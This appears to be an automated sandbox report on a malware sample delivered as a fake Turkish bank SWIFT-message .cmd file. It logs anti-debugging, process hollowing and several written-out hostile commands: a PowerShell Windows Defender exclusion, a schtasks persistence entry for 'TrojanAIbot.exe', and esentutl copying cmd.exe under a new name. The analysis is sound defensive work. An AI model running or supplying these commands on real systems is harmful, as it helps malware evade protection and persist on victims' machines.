Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98857	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98720	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98588	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98473	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98205	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97548	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97296	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97180	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97070	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96959	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96836	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96710	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96602	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96492	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96381	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99316	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99129	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98685	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98576	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97977	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97761	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97528	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97416	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97304	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97192	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97066	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96917	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96324	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96189	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96061	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95931	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99696
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99584
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99460
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99346
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99224
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99099
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98974
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98849
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98724
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98599
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98409
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98233
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98076
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97974
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97849
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97724
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97599
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97474
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97349
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97224
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97099
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96974
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96849
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96724
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96599
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96474
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99824
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99536
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99860
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99633
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99513
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99401
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99292
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99171
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99057
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98945
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98762
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98485
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98370
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98260
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98111
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97995
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97886
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97775
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97667
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97558
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97448
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97339
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97229
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96964
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96855
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96636
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96526
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96400
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99855
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99749
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99421
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99177
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99062
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98953
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98836
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98734
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98625
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98515
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98406
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98296
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98187
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98078
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97749
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97487
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: Wisrysxl.PIF, 00000018.00000002.2304345998.000000000087E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: lxsyrsiW.pif, 00000019.00000003.2307653207.000000001B2E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: x.exe, 00000004.00000002.2176035692.00000000008C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@4
Source: neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: x.exe, 00000004.00000002.2176035692.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 0000001C.00000002.2385410910.0000000000868000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node			graph_4-38021
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02B2F744

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B2894C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 10_1_004015D7 SetUnhandledExceptionFilter,	10_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 10_1_004015D7 SetUnhandledExceptionFilter,	10_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 25_1_004015D7 SetUnhandledExceptionFilter,	25_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 25_1_004015D7 SetUnhandledExceptionFilter,	25_1_004015D7

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 239008	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 364008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2B4008

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02B15ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02B1A7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02B15BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02B1A810
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	28_2_029E5ACC
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	28_2_029E5BD7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetLocaleInfoA,	28_2_029EA810

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
